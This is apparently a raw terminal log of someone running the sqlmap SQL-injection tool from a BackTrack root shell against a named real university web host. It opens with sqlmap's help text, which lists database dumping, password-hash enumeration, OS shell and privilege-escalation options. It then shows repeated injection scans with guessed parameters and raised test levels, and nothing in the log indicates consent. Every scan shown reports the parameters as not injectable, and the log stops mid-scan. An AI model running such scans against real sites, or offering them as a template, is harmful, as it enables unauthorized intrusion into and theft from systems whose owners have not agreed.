K - o - N Z - o - La

sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!
] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:33:19 Usage: python ./sqlmap.py [options] Options: -h, --help -hh -v VERBOSE Show basic help message and exit Show advanced help message and exit Verbosity level: 0-6 (default 1)
Target: At least one of these options has to be specified to set the source to get target urls from -d -u -l -m -r -g -c DIRECT URL, --url=URL LOGFILE BULKFILE REQUESTFILE GOOGLEDORK CONFIGFILE Direct connection to the database Target url Parse targets from Burp or WebScarab proxy logs Scan multiple targets enlisted in a given textual file Load HTTP request from a file Process Google dork results as target urls Load options from a configuration INI file
Request: These options can be used to specify how to connect to the target url --data=DATA --param-del=PDEL --cookie=COOKIE --load-cookies=LOC --cookie-urlencode --drop-set-cookie --user-agent=AGENT --random-agent --randomize=RPARAM --force-ssl --host=HOST --referer=REFERER --headers=HEADERS --auth-type=ATYPE --auth-cred=ACRED --auth-cert=ACERT --proxy=PROXY --proxy-cred=PCRED --ignore-proxy --delay=DELAY --timeout=TIMEOUT --retries=RETRIES --scope=SCOPE Data string to be sent through POST Character used for splitting parameter values HTTP Cookie header File containing cookies in Netscape/wget format URL Encode generated cookie injections Ignore Set-Cookie header from response HTTP User-Agent header Use randomly selected HTTP User-Agent header Randomly change value for given parameter(s) Force usage of SSL/HTTPS requests HTTP Host header HTTP Referer header Extra headers (e.g. "Accept-Language: fr\nETag: 123") HTTP authentication type (Basic, Digest or NTLM) HTTP authentication credentials (name:password) HTTP authentication certificate (key_file,cert_file) Use a HTTP proxy to connect to the target url HTTP proxy authentication credentials (name:password) Ignore system default HTTP proxy Delay in seconds between each HTTP request Seconds to wait before timeout connection (default 30) Retries when the connection timeouts (default 3) Regexp to filter targets from provided proxy log
--safe-url=SAFURL --safe-freq=SAFREQ --skip-urlencode --eval=EVALCODE
Url address to visit frequently during testing Test requests between two visits to a given safe url Skip URL encoding of POST data Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")
Optimization: These options can be used to optimize the performance of sqlmap -o --predict-output --keep-alive --null-connection --threads=THREADS Turn on all optimization switches Predict common queries output Use persistent HTTP(s) connections Retrieve page length without actual HTTP response body Max number of concurrent HTTP(s) requests (default 1)
Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER --dbms=DBMS --os=OS --invalid-bignum --invalid-logical --no-cast --prefix=PREFIX --suffix=SUFFIX --skip=SKIP --tamper=TAMPER Testable parameter(s) Force back-end DBMS to this value Force back-end DBMS operating system to this value Use big numbers for invalidating values Use logical operations for invalidating values Turn off payload casting mechanism Injection payload prefix string Injection payload suffix string Skip testing for given parameter(s) Use given script(s) for tampering injection data
Detection: These options can be used to specify how to parse and compare page content from HTTP responses when using blind SQL injection technique --level=LEVEL --risk=RISK --string=STRING --regexp=REGEXP --code=CODE --text-only --titles Level of tests to perform (1-5, default 1) Risk of tests to perform (0-3, default 1) String to match when query is evaluated to True Regexp to match when query is evaluated to True HTTP code to match when query is evaluated to True Compare pages based only on the textual content Compare pages based only on their titles
Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH --time-sec=TIMESEC --union-cols=UCOLS --union-char=UCHAR --dns-domain=DNAME Fingerprint: -f, --fingerprint SQL injection techniques to test for (default "BEUST") Seconds to delay the DBMS response (default 5) Range of columns to test for UNION query SQL injection Character to use for bruteforcing number of columns Domain name used for DNS exfiltration attack Perform an extensive DBMS version fingerprint
Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements
-b, --banner --current-user --current-db --is-dba --users --passwords --privileges --roles --dbs --tables --columns --schema --count --dump --dump-all --search -D DB -T TBL -C COL -U USER --exclude-sysdbs --start=LIMITSTART --stop=LIMITSTOP --first=FIRSTCHAR --last=LASTCHAR --sql-query=QUERY --sql-shell
Retrieve DBMS banner Retrieve DBMS current user Retrieve DBMS current database Detect if the DBMS current user is DBA Enumerate DBMS users Enumerate DBMS users password hashes Enumerate DBMS users privileges Enumerate DBMS users roles Enumerate DBMS databases Enumerate DBMS database tables Enumerate DBMS database table columns Enumerate DBMS schema Retrieve number of entries for table(s) Dump DBMS database table entries Dump all DBMS databases tables entries Search column(s), table(s) and/or database name(s) DBMS database to enumerate DBMS database table to enumerate DBMS database table column to enumerate DBMS user to enumerate Exclude DBMS system databases when enumerating tables First query output entry to retrieve Last query output entry to retrieve First query output word character to retrieve Last query output word character to retrieve SQL statement to be executed Prompt for an interactive SQL shell
Brute force: These options can be used to run brute force checks --common-tables --common-columns Check existence of common tables Check existence of common columns
User-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD --os-shell --os-pwn --os-smbrelay --os-bof --priv-esc --msf-path=MSFPATH --tmp-path=TMPPATH Execute an operating system command Prompt for an interactive operating system shell Prompt for an out-of-band shell, meterpreter or VNC One click prompt for an OOB shell, meterpreter or VNC Stored procedure buffer overflow exploitation Database process' user privilege escalation Local path where Metasploit Framework is installed Remote absolute path of temporary files directory
Windows registry access: These options can be used to access the back-end database management system Windows registry --reg-read --reg-add --reg-del --reg-key=REGKEY --reg-value=REGVAL --reg-data=REGDATA --reg-type=REGTYPE Read a Windows registry key value Write a Windows registry key value data Delete a Windows registry key value Windows registry key Windows registry key value Windows registry key value data Windows registry key value type
General: These options can be used to set some general working parameters -t TRAFFICFILE --batch --charset=CHARSET --check-tor --crawl=CRAWLDEPTH --csv-del=CSVDEL --dbms-cred=DCRED --eta --flush-session --forms --fresh-queries --hex --output-dir=ODIR --parse-errors --replicate --save --tor --tor-port=TORPORT --tor-type=TORTYPE --update Miscellaneous: -z MNEMONICS --beep --check-payload --check-waf --cleanup --dependencies --disable-hash --disable-like --gpage=GOOGLEPAGE --mobile --page-rank --purge-output --smart --test-filter=TSTF --wizard Log all HTTP traffic into a textual file Never ask for user input, use the default behaviour Force character encoding used for data retrieval Check to see if Tor is used properly Crawl the website starting from the target url Delimiting character used in CSV output (default ",") DBMS authentication credentials (user:password) Display for each output the estimated time of arrival Flush session files for current target Parse and test forms on target url Ignores query results stored in session file Uses DBMS hex function(s) for data retrieval Custom output directory path Parse and display DBMS error messages from responses Replicate dumped data into a sqlite3 database Save options to a configuration INI file Use Tor anonymity network Set Tor proxy port other than default Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5) Update sqlmap Use short mnemonics (e.g. "flu,bat,ban,tec=EU") Sound alert when SQL injection found Offline WAF/IPS/IDS payload detection testing Check for existence of WAF/IPS/IDS protection Clean up the DBMS by sqlmap specific UDF and tables Check for missing sqlmap dependencies Disable password hash cracking mechanism Disable LIKE search of identificator names Use Google dork results from specified page number Imitate smartphone through HTTP User-Agent header Display page rank (PR) for Google dork results Safely remove all content from output directory Conduct through tests only if positive heuristic(s) Select tests by payloads and/or titles (e.g. ROW) Simple wizard interface for beginner users
[*] shutting down at 06:33:19 root@bt:/pentest/database/sqlmap# python sqlmap.py -u www.ucka.veleri.hr/~skis/r epozitorij sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:35:20 [06:35:24] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:35:35] [CRITICAL] host 'www.ucka.veleri.hr' does not exist [*] shutting down at 06:35:35 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:35:47 [06:35:47] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:35:50] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? [Y/n] y [06:35:58] [INFO] heuristics detected web page charset 'ascii' [06:35:58] [INFO] testing if the url is stable, wait a few seconds [06:35:59] [WARNING] URI parameter '#1*' appears to be not dynamic [06:35:59] [WARNING] reflective value(s) found and filtering out [06:35:59] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:35:59] [INFO] testing for SQL injection on URI parameter '#1*' [06:35:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:36:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:36:05] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:36:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:36:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:36:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:36:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[06:36:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:36:10] [INFO] testing 'Oracle AND time-based blind' [06:36:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:36:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:36:17] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:36:22] [WARNING] URI parameter '#1*' is not injectable [06:36:22] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:36:22] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 141 times [*] shutting down at 06:36:22 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:38:55 [06:38:55] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:38:57] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? [Y/n] y [06:39:01] [INFO] heuristics detected web page charset 'ascii' [06:39:01] [INFO] testing if the url is stable, wait a few seconds [06:39:02] [WARNING] URI parameter '#1*' appears to be not dynamic [06:39:02] [WARNING] reflective value(s) found and filtering out [06:39:02] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:39:02] [INFO] testing for SQL injection on URI parameter '#1*' [06:39:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:39:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:39:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:39:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:39:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:39:05] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:39:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:39:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:39:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:39:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:39:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:39:09] [INFO] testing 'Oracle AND time-based blind' [06:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:39:14] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:39:21] [WARNING] URI parameter '#1*' is not injectable [06:39:21] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:39:21] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 142 times [*] shutting down at 06:39:21 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:51:21 [06:51:21] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters throug h --data option do you want to try URI injections in the target url itself? [Y/n/q] y [06:51:40] [INFO] testing connection to the target url sqlmap got a 301 redirect to 'http://ucka.veleri.hr/~skis/repozitorij/'. Do you want to follow? [Y/n] y [06:51:47] [INFO] heuristics detected web page charset 'ascii' [06:51:47] [INFO] testing if the url is stable, wait a few seconds [06:51:48] [WARNING] URI parameter '#1*' appears to be not dynamic [06:51:48] [WARNING] reflective value(s) found and filtering out [06:51:48] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable [06:51:48] [INFO] testing for SQL injection on URI parameter '#1*' [06:51:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:51:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:51:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:51:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:51:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:51:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:51:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:51:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:51:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:51:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:51:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:51:58] [INFO] testing 'Oracle AND time-based blind'
[06:51:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:52:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:52:03] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:52:09] [WARNING] URI parameter '#1*' is not injectable [06:52:09] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [06:52:09] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 35 times, 404 (Not Found) - 141 times [*] shutting down at 06:52:09 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:53:54 [06:53:54] [INFO] testing connection to the target url [06:53:54] [INFO] testing if the url is stable, wait a few seconds [06:53:55] [INFO] url is stable [06:53:55] [CRITICAL] no parameter(s) found for testing in the provided data (e. g. GET parameter 'id' in 'www.site.com/index.php?id=1') [*] shutting down at 06:53:55 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp id=1 --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:57:18 [06:57:19] [INFO] testing connection to the target url [06:57:19] [INFO] testing if the url is stable, wait a few seconds [06:57:20] [INFO] url is stable [06:57:20] [CRITICAL] no parameter(s) found for testing in the provided data (e. g. GET parameter 'id' in 'www.site.com/index.php?id=1') [*] shutting down at 06:57:20 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --dbs
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:57:34 [06:57:34] [06:57:34] [06:57:35] [06:57:35] [06:57:35] [06:57:35] [06:57:35] njectable [06:57:35] [INFO] testing connection to the target url [INFO] testing if the url is stable, wait a few seconds [INFO] url is stable [INFO] testing if GET parameter 'id' is dynamic [WARNING] GET parameter 'id' appears to be not dynamic [WARNING] reflective value(s) found and filtering out [WARNING] heuristic test shows that GET parameter 'id' might not be i [INFO] testing for SQL injection on GET parameter 'id'
[06:57:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:57:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [06:57:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [06:57:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [06:57:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [06:57:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' [06:57:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [06:57:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [06:57:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [06:57:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [06:57:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [06:57:47] [INFO] testing 'Oracle AND time-based blind' [06:57:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [06:57:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [06:57:58] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [06:58:08] [WARNING] GET parameter 'id' is not injectable [06:58:08] [CRITICAL] all parameters appear to be not injectable. Try to increas e --level/--risk values to perform more tests. Also, you can try to rerun by pro viding either a valid --string or a valid --regexp, refer to the user's manual f or details [*] shutting down at 06:58:08 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --level sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:58:30
Usage: python sqlmap.py [options] sqlmap.py: error: --level option requires an argument [*] shutting down at 06:58:30 root@bt:/pentest/database/sqlmap# python sqlmap.py -u ucka.veleri.hr/~skis/repoz itorij/repozitorij.jnlp?id=1 --level 5 sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 06:58:41 [06:58:41] [INFO] testing connection to the target url [06:58:41] [INFO] testing if the url is stable, wait a few seconds [06:58:42] [INFO] url is stable [06:58:42] [INFO] testing if GET parameter 'id' is dynamic [06:58:42] [WARNING] GET parameter 'id' appears to be not dynamic [06:58:42] [WARNING] reflective value(s) found and filtering out [06:58:42] [WARNING] heuristic test shows that GET parameter 'id' might not be i njectable [06:58:42] [INFO] testing for SQL injection on GET parameter 'id' [06:58:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [06:59:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS QL comment)' [06:59:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen eric comment)' [06:59:42] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (R LIKE)' [07:00:01] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig inal value)' [07:00:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [07:00:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT original value)' [07:00:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i nt - original value)' [07:00:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [07:00:03] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace ( original value)' [07:00:03] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par ameter replace (original value)' [07:00:04] [INFO] testing 'Oracle boolean-based blind - Parameter replace (origi nal value)' [07:00:04] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl ace (original value)' [07:00:04] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (or iginal value)' [07:00:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses' [07:00:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses (original value)'
[07:00:05] [INFO] testing BY clauses' [07:00:06] [INFO] testing BY clauses' [07:00:06] [INFO] testing ER BY clause' [07:00:07] [INFO] testing auses' [07:00:07] [INFO] testing RDER BY clauses' [07:00:07] [INFO] testing [07:00:21] [INFO] testing blind queries' [07:00:39] [INFO] testing [07:00:52] [INFO] testing ' [07:00:57] [INFO] testing (EXTRACTVALUE)' [07:01:04] [INFO] testing (UPDATEXML)' [07:01:10] [INFO] testing ' [07:01:15] [INFO] testing [07:01:18] [INFO] testing r HAVING clause' [07:01:27] [INFO] testing r HAVING clause (IN)' [07:01:32] [INFO] testing ype)' [07:01:36] [INFO] testing inaddr.get_host_address)' [07:01:38] [INFO] testing ys.drithsx.sn)' [07:01:43] [INFO] testing [07:01:46] [INFO] testing [07:01:46] [INFO] testing VALUE)' [07:01:47] [INFO] testing ML)' [07:01:47] [INFO] testing [07:01:47] [INFO] testing eplace' [07:01:47] [INFO] testing eplace (integer column)' [07:01:47] [INFO] testing [07:01:47] [INFO] testing [07:01:48] [INFO] testing ses' [07:01:48] [INFO] testing ses (EXTRACTVALUE)' [07:01:48] [INFO] testing ses (UPDATEXML)' [07:01:48] [INFO] testing s' [07:01:48] [INFO] testing ause' [07:01:48] [INFO] testing [07:01:48] [INFO] testing [07:01:51] [INFO] testing [07:01:56] [INFO] testing
'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER 'Microsoft SQL Server/Sybase boolean-based blind - ORD 'Oracle boolean-based blind - GROUP BY and ORDER BY cl 'Microsoft Access boolean-based blind - GROUP BY and O 'MySQL stacked conditional-error blind queries' 'Microsoft SQL Server/Sybase stacked conditional-error 'PostgreSQL stacked conditional-error blind queries' 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause 'PostgreSQL AND error-based - WHERE or HAVING clause' 'Microsoft SQL Server/Sybase AND error-based - WHERE o 'Microsoft SQL Server/Sybase AND error-based - WHERE o 'Oracle AND error-based - WHERE or HAVING clause (XMLT 'Oracle AND error-based - WHERE or HAVING clause (utl_ 'Oracle AND error-based - WHERE or HAVING clause (ctxs 'Firebird AND error-based - WHERE or HAVING clause' 'MySQL >= 5.0 error-based - Parameter replace' 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX 'PostgreSQL error-based - Parameter replace' 'Microsoft SQL Server/Sybase error-based - Parameter r 'Microsoft SQL Server/Sybase error-based - Parameter r 'Oracle error-based - Parameter replace' 'Firebird error-based - Parameter replace' 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau 'PostgreSQL error-based - GROUP BY and ORDER BY clause 'Microsoft SQL Server/Sybase error-based - ORDER BY cl 'Oracle error-based - GROUP BY and ORDER BY clauses' 'MySQL > 5.0.11 stacked queries' 'PostgreSQL > 8.1 stacked queries' 'PostgreSQL < 8.2 stacked queries (Glibc)'
[07:02:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [07:02:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' [07:02:13] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)' [07:02:19] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)' [07:02:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [07:02:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' [07:02:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [07:02:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)' [07:02:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [07:02:50] [INFO] testing 'Oracle AND time-based blind' [07:02:54] [INFO] testing 'Oracle AND time-based blind (comment)' [07:03:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [07:03:46] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [07:04:35] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [07:05:24] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns' [07:06:09] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [07:07:01] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns' [07:07:57] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns' [07:09:07] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns' [07:10:03] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns' [07:11:05] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns' [07:12:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [07:12:00] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio n [07:13:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns ' [07:14:15] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [07:15:06] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column s' [07:16:01] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' [07:16:47] [INFO] testing 'Generic UNION query (random number) - 21 to 30 column s' [07:17:42] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns' [07:18:38] [INFO] testing 'Generic UNION query (random number) - 31 to 40 column s' [07:19:36] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns' [07:20:42] [INFO] testing 'Generic UNION query (random number) - 41 to 50 column s' [07:21:33] [WARNING] GET parameter 'id' is not injectable [07:21:33] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [07:21:33] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic [07:21:33] [INFO] User-Agent parameter 'User-Agent' is dynamic [07:21:33] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable [07:21:33] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent' [07:21:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [07:21:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS QL comment)' [07:22:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen eric comment)' [07:22:19] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (R LIKE)' [07:22:32] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig inal value)' [07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT original value)' [07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
